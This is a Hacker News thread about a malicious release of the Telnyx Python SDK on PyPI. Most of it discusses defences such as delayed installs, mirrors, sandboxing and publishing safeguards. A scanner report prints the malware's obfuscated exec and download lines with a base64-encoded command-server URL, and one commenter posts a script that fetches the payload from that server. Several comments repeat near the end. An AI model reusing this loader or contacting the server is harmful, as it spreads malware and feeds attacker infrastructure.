Rendered at 19:48:33 GMT+0000 (Coordinated Universal Time) with Cloudflare Workers.
mil22 1 days ago [-]
For those using uv, you can at least partially protect yourself against such attacks by adding this to your pyproject.toml:
[tool.uv]
exclude-newer = "7 days"
or this to your ~/.config/uv/uv.toml:
exclude-newer = "7 days"
This will prevent uv picking up any package version released within the last 7 days, hopefully allowing enough time for the community to detect any malware and yank the package version before you install it.
notatallshaw 24 hours ago [-]
Pip maintainer here, to do this in pip (26.0+) now you have to manually calculate the date, e.g. --uploaded-prior-to="$(date -u -d '3 days ago' '+%Y-%m-%dT%H:%M:%SZ')"
In pip 26.1 (release scheduled for April 2026), it will support the day ISO-8601 duration format, which uv also supports, so you will be able to do --uploaded-prior-to=P3D, or via env vars or config files, as all pip options can be set in either.
VladVladikoff 20 hours ago [-]
Thanks!
lijok 20 hours ago [-]
[flagged]
jmward01 24 hours ago [-]
I am a slow adopter of uv. I'll be honest, its speed has never been a big deal to me and, in general, it is YAPT (yet another package tool), but this one feature may make me reconsider. Pinning versions is less than perfect but I would really like to be able to stay XXX days behind exactly for this reason.
I think the python community, and really all package managers, need to promote standard cache servers as first class citizens as a broader solution to supply chain issues. What I want is a server that presents pypi with safeguards I choose. For instance, add packages to the local index that are no less than xxx days old (this uv feature), but also freeze that unless an update is requested or required by a security concern, scan security blacklists to remove/block packages and versions that have been found to have issues. Update the cache to allow a specific version bump. That kind of thing. Basically, I have several projects and I just want to do a pip install but against my own curated pypi. I know this is the intent of virtual envs/lock files, etc, but coordinating across projects and having my own server to grab from when builds happen (guaranteeing builds won't fail) is import. At a minimum it would be good to have a 'curated.json' or something similar that I could point pip/other package managers to to enforce package policies across projects. These supply chain attacks show that all it takes is a single update and your are in big trouble so we, unfortunately, need more layers of defense.
zahlman 22 hours ago [-]
> I think the python community, and really all package managers, need to promote standard cache servers as first class citizens as a broader solution to supply chain issues. What I want is a server that presents pypi with safeguards I choose. For instance, add packages to the local index that are no less than xxx days old (this uv feature), but also freeze that unless an update is requested or required by a security concern, scan security blacklists to remove/block packages and versions that have been found to have issues. Update the cache to allow a specific version bump. That kind of thing.
If "my own curated pypi" extends as far as a whitelist of build artifacts, you can just make a local "wheelhouse" directory of those, and pass `--no-index` and `--find-links /path/to/wheelhouse` in your `pip install` commands (I'm sure uv has something analogous).
vrighter 16 hours ago [-]
if everyone waited a week, then everyb would still be installing it it the same time for the first time. This is not a solution.
TheTaytay 15 hours ago [-]
A lot of automated scanners run during that week.
vovavili 7 hours ago [-]
Let security researchers, staff and automated malware scanners take a bite first.
ashishb 19 hours ago [-]
Rather than being hopeful why not start running 'uv' inside sandbox?
Why does your python package (cli/Web server/library) need full access to your full disk at the time of execution?
dist-epoch 18 hours ago [-]
You're doing all of your software development inside containers, all the time?
That is very inconvenient.
ghgr 4 hours ago [-]
I'd argue it's not only not inconvenient, but also a great way of keeping your system clean of all the random system-wide dependencies you'll end up accumulating over the years.
TheTaytay 15 hours ago [-]
Devcontainers are looking pretty gold right now…
LtWorf 11 hours ago [-]
Why? Just open your entire editor/whatever inside a limited namespace and that's it no?
cestivan 12 hours ago [-]
[dead]
janzer 18 hours ago [-]
EDIT: This was caused by using an old version uv (0.7.3) updating with `uv self update` to the latest version (0.11.2) resolved it. Original message below:
While the first form seems to work with `pyproject.toml`, it seems like the second form in the global `uv.toml` only accepts actual dates and not relative times. Trying to put a relative time (either in the form "7 days" or "P7D") results in a failed to parse error.
madushan1000 21 hours ago [-]
I really wish uv had some sandboxing built in.
woodruffw 21 hours ago [-]
Please open an issue on the uv tracker! This is a design space we’re actively thinking about, and it’s valuable to hear user perspectives on what they would and wouldn’t want a sandbox to do.
__mharrison__ 24 hours ago [-]
Love it! Let those pip users find the compromised packages for us uv users.
bombcar 23 hours ago [-]
Until everyone waits 7 days to install everything so the compromise is discovered on the 8th day.
End result will be everyone runs COBOL only.
gonzalohm 23 hours ago [-]
Or just scan all GitHub repos, find their .toml definition. Calculate the median and then add 7 days to that. That way you are always behind.
dist-epoch 18 hours ago [-]
I'm already ahead of you. I'm using `exclude-newer = "8 days"`
zar1048576 23 hours ago [-]
:-) That might not even be enough as I hear (but haven't verified) that Claude does a pretty good job of making sense out of legacy COBOL code!
TacticalCoder 20 hours ago [-]
But not all project exploited in a supply chain attack get exploited on the same day.
So when project A gets pwned on day 1 and then, following the attack, project B gets pwned on day 3, if users wait 7 days to upgrade, then that leaves two days for the maintainers of project B to fix the mess: everybody shall have noticed on the 8th day that package A was exploited and that leaves time for project B (and the other projects depending on either A or B) to adapt / fix the mess.
As a sidenote during the first 7 days it could also happen that maintainers of project A notices the shenanigans.
anthk 22 hours ago [-]
Or Forth with scientific library, bound to the constraints. Put some HTTP library on top and some easy HTML interface from a browser with no JS/CSS3 support at all. It will look rusty but unexploitable.
Enterprise computing with custom software will make a comeback to avoid these pitfalls. I depise OpenJDK/Mono because of patents but at least they come with complete defaults and a 'normal' install it's more than enough to ship a workable application for almost every OS. Ah, well, smartphones. Serious work is never done with these tools, even with high end tables. Maybe commercials/salespeople and that's it.
It's either that... or promoting reproducible environment with Guix everywhere. Your own Guix container, isolated, importing Pip/CPAN/CTAN/NPM/OPAM and who knows else into a manifest file and ready to ship anywhere, either as a Guix package, a Docker container (Guix can do that), a single DEB/RPM, an AppImage ready to launch on any modern GNU/Linux with a desktop and a lot more.
dotancohen 17 hours ago [-]
> Or Forth with scientific library, bound to the constraints. Put some HTTP library on top and some easy HTML interface from a browser with no JS/CSS3 support at all. It will look rusty but unexploitable.
Let this be a lesson to you youngsters that nothing in unexploitable.
Forth has no standard library for interfacing with SQLite or any other database. You're either using 8th or the C ABI. Therefore, you'll most likely be concatenating SQL queries. Are you disciplined enough to make that properly secure? Do you know all the intricacies?
anthk 3 hours ago [-]
GForth might have then for sure (Sqlite it's small and supported by even jimtcl) . Also, there's Factor, a Forth inspired language.
mulmen 19 hours ago [-]
Does this also delay delivery of security fixes? Is there an override mechanism for a log4j type event?
dist-epoch 18 hours ago [-]
It delays everything. You can manually override some packages, but the community can't push through it.
mulmen 10 hours ago [-]
RPM (YUM? DNF? RHEL?) lets me subscribe to security updates separately from updates. Does that concept exist in language distribution?
8n4vidtmkvmk 2 hours ago [-]
I don't know how it would. Hackers would just claim everything is a security update.
Unless maybe you give special permission to some trusted company to designate certain releases of packages they don't own are security patches... But that sounds untenable.
what 20 hours ago [-]
Is “7 days” valid? Docs suggest it has to be an iso 8601 period or a rfc 3339 timestamp.
"Accepts RFC 3339 timestamps (e.g., 2006-12-02T02:07:43Z), a \"friendly\" duration (e.g., 24 hours, 1 week, 30 days), or an ISO 8601 duration (e.g., PT24H, P7D, P30D)."
TZubiri 1 days ago [-]
Nice feature. However uv is suspect at the moment, in the sense that it is designed as a pip replacement to overcome issues that only exist when supply chains are of a size that isn't safe to have.
So any project that has UV and any developer that tries to get uv into a project is on average less safe than a project that just uses pip and a requirements.txt
sdoering 1 days ago [-]
Sorry - call me uninformed. But I do not really understand how choosing uv makes me less safe than using pip.
Care to explain? Would love to learn.
jcass8695 1 days ago [-]
It is a bit of a leap. They are saying that if you are using uv, then you likely have a broad set of dependencies because you require a dependency management tool, therefore you are more susceptible to a supply chain attack by virtue of having a wider attack surface.
sdoering 21 hours ago [-]
Ahhhhhh thanks a ton. Now I get it. Meaning I get what you are saying. Not what they were implying. But yeah. I can understand at least how one could arrive at that idea.
To me personally this idea still sounds a bit off - but as a heuristic it might have some merit in certain circumstances.
Imustaskforhelp 1 days ago [-]
I really am not able to follow this line of reasoning, I am not sure if what you said makes sense and how it relates to uv having a security feature to be on average less safe :/
thewebguyd 24 hours ago [-]
I believe they are saying that by the time you need something like uv, your project already has too many dependencies. Its the unnecessarily large supply chain that's the problem, and uv exists to solve a problem that you should try to avoid in the first place.
I think uv is great, but I somewhat agree. We see this issue with node/npm. We need smaller supply chains/less dependencies overall, not just bandaiding over the poor decisions with better dependency management tooling.
catgary 23 hours ago [-]
This line of thought is honestly a bit silly - uv is just a package manager that actually does its job for resolving dependencies. You’re talking about a completely orthogonal problem.
zahlman 22 hours ago [-]
> uv is just a package manager that actually does its job for resolving dependencies.
Pip resolves dependencies just fine. It just also lets you try to build the environment incrementally (which is actually useful, especially for people who aren't "developers" on a "project"), and is slow (for a lot of reasons).
duskdozer 8 hours ago [-]
uv is really only something you need if you already aren't managing dependencies responsibly, imo.
Imustaskforhelp 23 hours ago [-]
Ah this simplifies what they were saying.
I agree with it that dependency management should be made easier. To be honest, I really like how golang's dependency and how golang's community works around dependencies and how golang has a really great stdlib to work with and how the community really likes to rely on very little depenendencies for the most part as well.
Maybe second to that, Zig is interesting as although I see people using libraries, its on a much lower level compared to rust/node/python.
Sadly, rust suffers from the same dependency issue like node/python.
joshred 1 days ago [-]
This is complete nonsense. pip has all the same problems that you say uv has.
cozzyd 19 hours ago [-]
The (not very convincing, IMO) argument is that pip becomes unergonikix for a certain dependency tree size leading people to use uv instead. Of course that's not the only or main reason people use uv, presumably.
paulddraper 1 days ago [-]
Huh?
Wanting a better pip means I am unsafe?
f311a 1 days ago [-]
They did not even try to hide the payload that much.
Every basic checker used by many security companies screams at `exec(base64.b64decode` when grepping code using simple regexes.
hexora audit 4.87.1/2026-03-27-telnyx-v4.87.1.zip --min-confidence high --exclude HX4000
warning[HX9000]: Potential data exfiltration with Decoded data via urllib.request.request.Request.
┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:77
86:13
│
7783 │ except:
7784 │ pass
7785 │
7786 │ r = urllib.request.Request(_d('aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg=='), headers={_d('VXNlci1BZ2VudA=='): _d('TW96aWxsYS81LjA=')})
│ ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ HX9000
7787 │ with urllib.request.urlopen(r, timeout=15) as d:
7788 │ with open(t, "wb") as f:
7789 │ f.write(d.read())
│
= Confidence: High
Help: Data exfiltration is the unauthorized transfer of data from a computer.
warning[HX4010]: Execution of obfuscated code.
┌─ 2026-03-27-telnyx-v4.87.1.zip:tmp/tmp_79rk5jd/telnyx/telnyx/_client.py:78
10:9
│
7807 │ if os.name == 'nt':
7808 │ return
7809 │ try:
7810 │ ╭ subprocess.Popen(
7811 │ │ [sys.executable, "-c", f"import base64; exec(base64.b64decode('{_p}').decode())"],
7812 │ │ stdout=subprocess.DEVNULL,
7813 │ │ stderr=subprocess.DEVNULL,
7814 │ │ start_new_session=True
7815 │ │ )
│ ╰─────────^ HX4010
7816 │ except:
7817 │ pass
7818 │
│
= Confidence: VeryHigh
Help: Obfuscated code exec can be used to bypass detection.
m000 1 days ago [-]
Are there more tools like hexora?
f311a 1 days ago [-]
GuardDog, but it's based on regexes
jbrowning 1 days ago [-]
> The payload isn't delivered as a raw binary or a Python file. It's disguised as a .wav audio file.
> The WAV file is a valid audio file. It passes MIME-type checks. But the audio frame data contains a base64-encoded payload. Decode the frames, take the first 8 bytes as the XOR key, XOR the rest, and you have your executable or Python script.
Talk about burying the lede.
consp 23 hours ago [-]
I've seen it at least once in code from a big car manufacturer who encrypted their software or parts of it to avoid you reading the xml files. They use a key, split into two or more parts, hidden as the first bytes of some file or as plain text somewhere it would not be out of order, then recombine, run through an deobfuscation function to be an old fashioned DES or XOR key to decrypt the (usually XML, could have been a different key format it's been a while) files. It's not that uncommon. It's also security theater. Funny part is they didn't obfuscate the code to read the key.
dist-epoch 18 hours ago [-]
With homomorphic encryption you can do this now in a secure way - unbreakable client side obfuscation.
ac29 22 hours ago [-]
I was really hoping the audio file was going to be AFSK or someting
zahlman 21 hours ago [-]
> If the version shown is 4.87.1 or 4.87.2, treat the environment as compromised.
More generally speaking one would have to treat the computer/container/VM as compromised. User-level malware still sucks. We've seen just the other day that Python code can run at startup time with .pth files (and probably many other ways). With a source distribution, it can run at install time, too (see e.g. https://zahlman.github.io/posts/python-packaging-3/).
> What to Do If Affected
> Downgrade immediately:
> pip install telnyx==4.87.0
Even if only the "environment" were compromised, that includes pip in the standard workflow. You can use an external copy of pip instead, via the `--python` option (and also avoid duplicating pip in each venv, wasting 10-15MB each time, by passing `--without-pip` at creation). I touch on both of these in https://zahlman.github.io/posts/python-packaging-2/ (specifically, showing how to do it with Pipx's vendored copy of pip). Note that `--python` is a hack that re-launches pip using the target environment; pip won't try to import things from that environment, but you'd still be exposed to .pth file risks.
dist-epoch 18 hours ago [-]
Nice thing about VMs is that it's easy to have a daily snapshot, and roll it back to before compromise event.
ramimac 1 days ago [-]
We haven't blogged this yet, but a variety of teams found this in parallel.
I'm glad there's many teams with automated scans of pypi and npm running. It elevates the challenge of making a backdoor that can survive for any length of time.
Imustaskforhelp 1 days ago [-]
Ramimac, has there been any action on having the c2 server's ip address being blacklisted?
The blast radius of TeamPCP just keeps on increasing...
6thbit 23 hours ago [-]
So both this and litellm went straight to PyPI without going to GitHub first.
Is there any way to setup PyPI to only publish packages that come from a certain pattern of tag that exists in GH? Would such a measure help at all here?
woodruffw 21 hours ago [-]
Yes: if you use a Trusted Publisher with PyPI, you can constrain it to an environment. Then, on GitHub, you can configure that environment with a tag or branch protection rule that only allows the environment to be activated if the ref matches. You can also configure required approvers on the environment, to prevent anyone except your account (and potentially other maintainers you’d like) from activating the environment.
LtWorf 11 hours ago [-]
If they have compromised the token wouldn't that mean the developer is compromised and such access can be used to just put "curl whatever" into the build and publish that payload on pypi?
woodruffw 7 hours ago [-]
I don’t understand the question, sorry.
LtWorf 5 hours ago [-]
I'll try to reformulate in a simpler way.
On debian, all builds happen without internet access. So whatever ends up on the .deb file is either contained on the dependencies or in the orig tarball.
Is anything similar done for builds that create artifacts for pypi, so that a certain correspondence between binary file and sources exists? Or is there unrestricted internet access so that what actually ends up on pypi can come from anywhere and vetting the sources is of little help?
woodruffw 4 hours ago [-]
That’s a nice property of centralized package management systems; I don’t think anything exactly like that exists for PyPI. The closest thing would be a cryptographic attestation.
(If I wanted to taxonomize these things, I say that the Debian model is effectively a pinky promise that the source artifacts correspond to the built product, except that it’s a better pinky promise because it’s one-to-many instead of many-to-many like language package managers generally are. You can then formalize that pinky promise with keys and signatures, but at the end of the day you’re still essentially binding a promise.)
functional_dev 2 hours ago [-]
wasnt PEP 740 an attempt to solve this?
aniceperson 22 hours ago [-]
Don't have the token on your hands. Use OICD ideally, or make sure to setup carefully as a repository secret. Ensure the workflow runs in a well permission read, minimal dependency environment.
The issue with OICD is that it does not work with nested workflows because github does not propagate the claims.
sh-cho 9 hours ago [-]
*OIDC
_ache_ 20 hours ago [-]
How can we get the wav ? `curl -A "Mozilla/5.0" "http://<C2C_EndPoint>/hangup.wav"` does hang.
No ... I tried hard.
But still get a timeout.
import urllib.request
import base64
def _d(x):
return base64.b64decode(x).decode("utf-8")
C2C_URL = _d("aHR0cDovLzgzLjE0Mi4yMDkuMjAzOjgwODAvaGFuZ3VwLndhdg==")
# C2C_URL = "http://XXXXX:8080/ringtone.wav"
r = urllib.request.Request(
C2C_URL, headers={_d("VXNlci1BZ2VudA=="): _d("TW96aWxsYS81LjA=")}
)
with urllib.request.urlopen(r, timeout=15) as d:
with open("/tmp/exatracted_tpcp.wav", "wb") as f:
f.write(d.read())
viscousviolin 1 days ago [-]
Is there a notification channel you can subscribe to / look at if you want to stay up to date on compromised PyPI packages?
> The Telnyx platform, APIs, and infrastructure were not compromised. This incident was limited to the PyPI distribution channel for the Python SDK.
Am I being too nitpicky to say that that is part of your infrastructure?
Doesn't 2FA stop this attack in its tracks? PyPI supports 2FA, no?
cpburns2009 19 hours ago [-]
PyPI only supports 2FA for sign-in. 2FA is not a factor at all with publishing. To top it off, the PyPA's recommended solution, the half-assed trusted publishing, does nothing to prevent publishing compromised repos either.
rtpg 20 hours ago [-]
Yeah at this point I’d really like for pypi to insist on 2FA and email workflows for approving a release.
Yeah it means you don’t get zero click releases. Maybe boto gets special treatment
LtWorf 10 hours ago [-]
No. I was one of the "lucky" ones forced to use 2FA from the beginning.
I also wrote the twine manpage (in debian) because at the time there was even no way of knowing how to publish at all.
Basically you enable 2FA on your account, go on the website, generate a token, store it in a .txt file and use that for the rest of your life without having to use 2FA ever again.
I had originally thought you'd need your 2FA every upload but that's not how it works.
Then they have the trusted publisher thing (which doesn't and won't work with codeberg) where they just upload whatever comes from github's runners. Of course if the developer's token.txt got compromised, there's a chance also his private ssh key to push on github got compromised and the attackers can push something that will end up on pypi anyway.
Remember that trusted publishing replaces GPG signatures, so the one thing that required unlocking the private key with a passphrase is no longer used.
python.org has also stopped signing their releases with GPG in favour to sigstore, which is another 3rd party signing scheme somewhat similar to trusted publisher.
edit: They deny this but my suspicion is that eventually tokens won't be supported and trusted publishing will be the only way to publish on pypi, locking projects out of using codeberg and whatever other non-major forge they might wish to use.
cpburns2009 8 hours ago [-]
A stolen PyPI token was uses for the compromized litellm package. I wouldn't be surprized if tokens will be decommissioned in the aftermath of these recent hijackings. That wouldn't prevent these attacks as you mentioned SSH keys were stolen (and a Github token in the case of litellm). It would be a way for PyPA to brush off liability without securing anything.
woodruffw 7 hours ago [-]
I’ll bypass the technical inaccuracies in this comment to focus on the main important thing.
> Then they have the trusted publisher thing (which doesn't and won't work with codeberg) where they just upload whatever comes from github's runners.
There’s no particular reason it wouldn’t work; it’s just OIDC and Codeberg could easily stand up an IdP. If you’re willing to put the effort into making this happen, I’d be happy (as I’ve said before) to review any contributions towards this end.
(The only thing that won’t work here is imputing malicious intent; that makes it seem like you have a score to settle rather than a genuine technical interest in the community.)
Has anyone here used Telnyx? I tried to build a product against their API last year and 3 weeks after signing up they banned my account and made it impossible to get an answer as to why or re-enable it.
AnssiH 10 hours ago [-]
I tried, but they used some 3rd party KYC platform whose country selection dropdown seemed to have every country except Finland (even Åland, a region of Finland, was there).
Support wasn't helpful.
Went with Twilio instead.
Meetvelde 19 hours ago [-]
I've had a pretty good experience using it to send SMS. Any chance you didn't get a 10DLC or toll free verification and tried to send too many messages?
sunshine-o 6 hours ago [-]
I believe Telnyx and Twilio nuked every small or personal accounts at some point because they couldn't risk those being used for spam or scams.
There might have been some real risks for them, IDK.
But it is ironic that now Telnyx brand itself as an AI company but they couldn't detect that I am just calling some family once in a while and not involved in massive spam campaign.
The only one who kept me around was voip.ms but it literally doesn't work.
I am still looking for a decent VoIP provider to simply make calls.
TZubiri 1 days ago [-]
I like it so far. Did you call phone support at the time and ask about it? I find it's easy enough to get in a call with a human.
ivanvanderbyl 24 hours ago [-]
I did, they asked me to open a support ticket, which I did, and the last response I got was:
> We've reviewed the details you provided and updated your case with the necessary information. It is now being routed to the appropriate team for further support.
That was July 2025!
raphinou 10 hours ago [-]
I'm working on a multi signature system for file authentication that can detect unauthorized file publications. It is self-funded, open source, auditable, self hostable, accountless. I'm looking for testers and feedback, don't hesitate to contact me if interested.
More info at https://asfaload.com/
ilaksh 1 days ago [-]
The way I use Telynx is via SIP which is an open protocol. No reason we should be relying on proprietary APIs for this stuff.
On GitHub see my fork runvnc/PySIP. Please let me know if you know if something better for python that is not copy left or rely on some copy left or big external dependency. I was using baresip but it was a pain to integrate and configure with python.
Anyway, after fixing a lot in the original PySIP my version works with Telynx. Not tested on other SIP providers.
jlundberg 1 days ago [-]
We have always been API first rather than SDK first.
Never really thought too much about the security implications but that is of course a benefit too.
Main reasoning for us has been to aim for a really nice HTTP API rather than hide uglyness with an SDK on top.
1 days ago [-]
infinitewars 1 days ago [-]
Is this happening in part due to the sheer volume of pull-requests with AI generated code.. things are slipping through?
dgellow 6 hours ago [-]
The telnyx SDKs aren’t AI generated code. The issue here was a pypi account compromise
cozzyd 19 hours ago [-]
Wonder if publishing keys were compromised in one of the previous PyPI incidents...
slowmovintarget 1 days ago [-]
Telnyx provides voice capabilities for OpenClaw for those wondering.
indigodaddy 1 days ago [-]
They should add voip.ms. it's better all around I think
_JamesA_ 23 hours ago [-]
Voip.ms is great for a simple SIP trunk but it has almost none of the programmable voice and other features of Telnyx or Twilio.
RulerOf 21 hours ago [-]
A number of years ago I wanted to drop a webhook when a call came in on VoIP.ms but couldn't find any way to do it natively.
Ended up sticking a twilio endpoint in the ring group with a "press 1 to accept this call" message so it wouldn't eat the call, then was able to fire an http request with the call details.
It worked well, although I admit I was a little annoyed I couldn't do it directly with VoIP.ms.
indigodaddy 22 hours ago [-]
ah yeah, I'm about to setup a grandstream ht801 for a voip home phone so I probably dont need all that
sunshine-o 6 hours ago [-]
I had an horrible experience with VoIP.ms.
Every time I wanted to call a number in Europe I had to contact their support and go through "can you try now and see if works?" several time.
After 3 months I had enough of it and asked to have my provisioned credit reimbursed but they just refused.
indigodaddy 1 days ago [-]
Hah, need to setup a Grandstream HT801 this weekend and this cements my decision to use voip.ms vs telnyx. Not that the device would use that library (have no idea), but just, yeah generally, it's a good cue to stay away for me.
kelvinjps10 23 hours ago [-]
I received an email from them about the vulnerability but I don't remember ever using them
charcircuit 1 days ago [-]
2FA needs to be required for publishing packages. An attacker compromising someone's CI should not give them free reign to publish malicious packages at any time they want.
woodruffw 1 days ago [-]
In a lot of cases, it's not really clear whose second factor would authorize publishing a package that was uploaded from a CI/CD system. Is it any project owner? Anyone from the same GitHub organization? etc.
> An attacker compromising someone's CI should not give them free reign to publish malicious packages at any time they want.
Agreed, that's why a lot of packaging ecosystems (including PyPI) have moved towards schemes that involve self-scoping, self-expiring tokens. The CI can still publish, but the attacker can no longer exfiltrate the publishing credential and use it indefinitely later.
(These schemes are not mandatory, because they can't be.)
charcircuit 24 hours ago [-]
The 2FA of whatever account is publishing the package. I'm pretty sure Pypi already has this figured out except they seem to allow you to make an API key which just bypasses checking a 2nd factor.
woodruffw 23 hours ago [-]
Which account is publishing the package, in a CI/CD context? It's not clear that any particular account is, since the set of people who can trigger a workflow in CI/CD aren't necessarily (and in fact aren't often) the same set of people who can create an API token on PyPI.
charcircuit 20 hours ago [-]
The user that owns the API key or whoever it already associates what account is doing the publishing. It isn't a new problem.
sigseg1v 1 days ago [-]
but then how can we deploy our vibe coded PRs we didn't review at a pace of 40 deploys per day?
paulddraper 24 hours ago [-]
Sounds like 2FA should be required for CI.
spocchio 24 hours ago [-]
Is there anyone who uses it? I see their repo's Initial Commit was on Jan 2026... quite a new package! Also, the number of GitHub stars and forks is quite low.
Does the package have a user base, or did the malicious team target one of the many useless GitHub repos?
KomoD 23 hours ago [-]
> I see their repo's Initial Commit was on Jan 2026... quite a new package!
That's incorrect, the repo and package date back to 2019
dlcarrier 1 days ago [-]
At this point, I'm not updating anything using Python.
Not that I had the option anyway, because everything using Python breaks if you update it. You know they've given up on backward comparability and version control, when the solution is: run everything in a VM, with its own installation. Apparently it's also needed for security, but the VMs aren't really set up to be secure.
I don't get why everything math heavy uses it. I blame MATLAB for being so awful that it made Python look good.
It's not even the language itself, not that it doesn't have its own issues, or the inefficient way it's executed, but the ecosystem around it is so made out of technical debt.
It sounds to me like they are: `You know they've given up on backward comparability and version control, when the solution is: run everything in a VM, with its own installation.`
uv taking over basically ensures that dependencies won't become managed properly and nothing will work without uv
TZubiri 1 days ago [-]
Agree. I was working on an open source package, noticed something weird, and noticed the size of the uv.lock and got a bit scared.
It's a pandemic, I will be hardening my security, and rotating my keys just in case.
hrmtst93837 8 hours ago [-]
Math and science picked Python because NumPy, SciPy, and pandas gave them a decent glue layer over C and Fortran, and once the papers, notebooks, and teaching material piled up, the lock-in was social as much as technical. MATLAB being awful helped, but only at the margin.
venv and Docker don't fix much. They just freeze the mess until rebuild day, when you find out half the stack depended on an old wheel, a dead maintainer, or a C extension that no longer compiles on a current Python.
paulddraper 24 hours ago [-]
Python is genuinely a pleasant syntax and experience. [1]
It's the closest language to pseudocode that exists.
Like every other language from 1991, it has rough edges.
I think it's only a matter of time at this point before a devastating supply chain attack occurs.
Supply-chain security is such a dumpster fire, and threat actors are realising that they can use LLMs to organize such attacks.
dgellow 6 hours ago [-]
Not sure what you mean by devastating, but supply chain attacks occur pretty much daily worldwide and LLMs have been used by attackers since multiple years at that point. Defending against supply chain threats is a pretty hard area to iterate and things are slow to change. For example pypi only supports trusted publishers since 2023 IIRC, and lots of large companies are still not consistently using that option
anthk 22 hours ago [-]
The Guix PM in this context can create an isolated environment and import PyPI packages for you adapted into Guix Scheme manifest files. Not just Python, Perl, Ruby, Node... if you have to use dangerous our propietary environments for the enterprise, (not for personal computing), at least isolate them so the malware doesn't spread over.
rvz 1 days ago [-]
That's not good. Time to raise the package security draw bridge on vibe coders.
doug_durham 1 days ago [-]
In what world does professional hackers intersect with vibe coding? This is a professional attack. Not some amateur script kiddie action.
TZubiri 1 days ago [-]
Shoutouts to all the real engineers who use a generic http client to call APIs and weren't impacted by this.
LoganDark 1 days ago [-]
I used to use Telnyx many years ago, but was squeezed out when they started adding layer after layer of mandatory identity verification. Nope.
devnotes77 20 hours ago [-]
[dead]
iam_circuit 20 hours ago [-]
[dead]
midnightrun_ai 1 days ago [-]
[dead]
jeremie_strand 14 hours ago [-]
[flagged]
jeremie_strand 17 hours ago [-]
[flagged]
jeremie_strand 18 hours ago [-]
[flagged]
zar1048576 23 hours ago [-]
[dead]
midnightrun_ai 13 hours ago [-]
[dead]
midnightrun_ai 1 days ago [-]
[dead]
riteshkew1001 12 hours ago [-]
[dead]
masterjay 1 days ago [-]
[dead]
carlsborg 1 days ago [-]
Anthropic/OpenAI could own this space. They should offer a paid service that offers a mirror with LLM scanned and sandbox-evaluated package with their next gen models. Free for individuals, orgs can subscribe to it.
oblvious-earth 1 days ago [-]
OpenAI just acquired Astral who have an index service called pyx, so they would have a step up.
My understanding though is most corporations that take security seriously either build everything themselves in a sandbox, or use something like JFrog's Artifactory with various security checks, and don't let users directly connect to public indexes. So I'm not sure what the market is.
doc_ick 1 days ago [-]
There’s also virustotal, any.run, probably a few others outside of GitHub/gitlab scans
dmitrygr 21 hours ago [-]
Detecting properly-written malicious code is undecidable. No amount of snake oil fixes that
johndough 1 days ago [-]
Judging by curl shutting down its bug bounty program due to AI slop, a likely outcome would be that this mirror has no packages because they are all blocked by false positives.
In pip 26.1 (release scheduled for April 2026), it will support the day ISO-8601 duration format, which uv also supports, so you will be able to do --uploaded-prior-to=P3D, or via env vars or config files, as all pip options can be set in either.
I think the python community, and really all package managers, need to promote standard cache servers as first class citizens as a broader solution to supply chain issues. What I want is a server that presents pypi with safeguards I choose. For instance, add packages to the local index that are no less than xxx days old (this uv feature), but also freeze that unless an update is requested or required by a security concern, scan security blacklists to remove/block packages and versions that have been found to have issues. Update the cache to allow a specific version bump. That kind of thing. Basically, I have several projects and I just want to do a pip install but against my own curated pypi. I know this is the intent of virtual envs/lock files, etc, but coordinating across projects and having my own server to grab from when builds happen (guaranteeing builds won't fail) is import. At a minimum it would be good to have a 'curated.json' or something similar that I could point pip/other package managers to to enforce package policies across projects. These supply chain attacks show that all it takes is a single update and your are in big trouble so we, unfortunately, need more layers of defense.
FWIW, https://pypi.org/project/bandersnatch/ is the standard tool for setting up a PyPI mirror, and https://github.com/pypi/warehouse is the codebase for PyPI itself (including the actual website, account management etc.).
If "my own curated pypi" extends as far as a whitelist of build artifacts, you can just make a local "wheelhouse" directory of those, and pass `--no-index` and `--find-links /path/to/wheelhouse` in your `pip install` commands (I'm sure uv has something analogous).
Why does your python package (cli/Web server/library) need full access to your full disk at the time of execution?
That is very inconvenient.
While the first form seems to work with `pyproject.toml`, it seems like the second form in the global `uv.toml` only accepts actual dates and not relative times. Trying to put a relative time (either in the form "7 days" or "P7D") results in a failed to parse error.
End result will be everyone runs COBOL only.
So when project A gets pwned on day 1 and then, following the attack, project B gets pwned on day 3, if users wait 7 days to upgrade, then that leaves two days for the maintainers of project B to fix the mess: everybody shall have noticed on the 8th day that package A was exploited and that leaves time for project B (and the other projects depending on either A or B) to adapt / fix the mess.
As a sidenote during the first 7 days it could also happen that maintainers of project A notices the shenanigans.
Enterprise computing with custom software will make a comeback to avoid these pitfalls. I depise OpenJDK/Mono because of patents but at least they come with complete defaults and a 'normal' install it's more than enough to ship a workable application for almost every OS. Ah, well, smartphones. Serious work is never done with these tools, even with high end tables. Maybe commercials/salespeople and that's it.
It's either that... or promoting reproducible environment with Guix everywhere. Your own Guix container, isolated, importing Pip/CPAN/CTAN/NPM/OPAM and who knows else into a manifest file and ready to ship anywhere, either as a Guix package, a Docker container (Guix can do that), a single DEB/RPM, an AppImage ready to launch on any modern GNU/Linux with a desktop and a lot more.
Forth has no standard library for interfacing with SQLite or any other database. You're either using 8th or the C ABI. Therefore, you'll most likely be concatenating SQL queries. Are you disciplined enough to make that properly secure? Do you know all the intricacies?
Unless maybe you give special permission to some trusted company to designate certain releases of packages they don't own are security patches... But that sounds untenable.
"Accepts RFC 3339 timestamps (e.g., 2006-12-02T02:07:43Z), a \"friendly\" duration (e.g., 24 hours, 1 week, 30 days), or an ISO 8601 duration (e.g., PT24H, P7D, P30D)."
So any project that has UV and any developer that tries to get uv into a project is on average less safe than a project that just uses pip and a requirements.txt
Care to explain? Would love to learn.
To me personally this idea still sounds a bit off - but as a heuristic it might have some merit in certain circumstances.
I think uv is great, but I somewhat agree. We see this issue with node/npm. We need smaller supply chains/less dependencies overall, not just bandaiding over the poor decisions with better dependency management tooling.
Pip resolves dependencies just fine. It just also lets you try to build the environment incrementally (which is actually useful, especially for people who aren't "developers" on a "project"), and is slow (for a lot of reasons).
I agree with it that dependency management should be made easier. To be honest, I really like how golang's dependency and how golang's community works around dependencies and how golang has a really great stdlib to work with and how the community really likes to rely on very little depenendencies for the most part as well.
